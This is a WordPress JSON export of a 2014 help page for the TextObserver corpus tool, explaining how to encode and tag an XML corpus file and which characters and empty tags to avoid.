{"id":210,"date":"2014-05-31T11:26:51","date_gmt":"2014-05-31T10:26:51","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/textobserver\/?p=210"},"modified":"2018-09-18T16:19:28","modified_gmt":"2018-09-18T15:19:28","slug":"balisage-xml-sur-la-forme-graphique","status":"publish","type":"post","link":"http:\/\/textopol.u-pec.fr\/textobserver\/?p=210","title":{"rendered":"XML tagging on the graphical form"},"content":{"rendered":"<p><!--:fr-->1. Encoding the xml file<\/p>\n<p>When creating the xml file, choose ANSI or UTF-8 encoding, and be sure to specify that encoding when loading the file into TextObserver so that accented characters are encoded correctly. Saving as plain text from Word produces ANSI.<\/p>\n<p>When saving, remember to check \u201cAllow character substitution\u201d to avoid, among other things, encoding problems with quotation marks.<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-356\" alt=\"textebrut-autoriser-remplacement-caracteres\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres.jpg\" width=\"777\" height=\"388\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres.jpg 777w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres-300x149.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/textebrut-autoriser-remplacement-caracteres-624x311.jpg 624w\" sizes=\"(max-width: 777px) 100vw, 777px\" \/><\/a><\/p>\n<p>NB: Notepad++ can convert the encoding cleanly if necessary (menu Encoding &gt; Convert to \u2026)<\/p>\n<p>2. 
Tagging the corpus<\/p>\n<p>Each division of the corpus (partition) must be enclosed in tags.<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1.jpg\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-216\" alt=\"balise1\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1.jpg\" width=\"621\" height=\"200\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1.jpg 621w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balise1-300x96.jpg 300w\" sizes=\"(max-width: 621px) 100vw, 621px\" \/><\/a><\/p>\n<p>Excerpt from the tagged file:<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-215\" alt=\"balisage-xml\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml.jpg\" width=\"621\" height=\"576\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml.jpg 621w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/balisage-xml-300x278.jpg 300w\" sizes=\"(max-width: 621px) 100vw, 621px\" \/><\/a><\/p>\n<p>Forbidden characters:<\/p>\n<ul>\n<li>The texts must never contain angle brackets (&lt; or &gt;), because these characters interfere with the xml tags.<\/li>\n<li>Do not leave any &amp; (ampersand) in the text.<\/li>\n<li>~ (tildes) also cause problems.<\/li>\n<li>No tab characters.<\/li>\n<li>Do not use html codes to replace special or accented characters in the text.<\/li>\n<li>the tag (in English) is a reserved tag&#8230; do not use it to enclose the divisions of the corpus.<\/li>\n<\/ul>\n<p>NB: The file must never contain an 
empty tag (partition or W)<br \/>\nExample of an empty tag:<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide.jpg\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-248\" alt=\"exemple-balise-xml-vide\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-1024x89.jpg\" width=\"625\" height=\"54\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-1024x89.jpg 1024w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-300x26.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide-624x54.jpg 624w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/exemple-balise-xml-vide.jpg 1305w\" sizes=\"(max-width: 625px) 100vw, 625px\" \/><\/a><br \/>\n(a word must appear between the opening tag and the closing tag)<\/p>\n<p>Once the corpus is tagged, save it as txt, then change the .txt extension to .xml<br \/>\nCopy this file into a folder at the root of TextObserver.<\/p>\n<p><a title=\"Import an xml corpus\" href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/?p=46\">&gt;&gt; import a corpus<\/a><!--:--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. 
Encoding the xml file When creating the xml file, choose ANSI or UTF-8 encoding, and be sure to specify that encoding when loading the file into TextObserver so that accented characters are encoded correctly. Saving as plain text from Word produces ANSI. When saving, remember to check \u201cAllow character [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/210"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=210"}],"version-history":[{"count":20,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions"}],"predecessor-version":[{"id":375,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions\/375"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=210"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}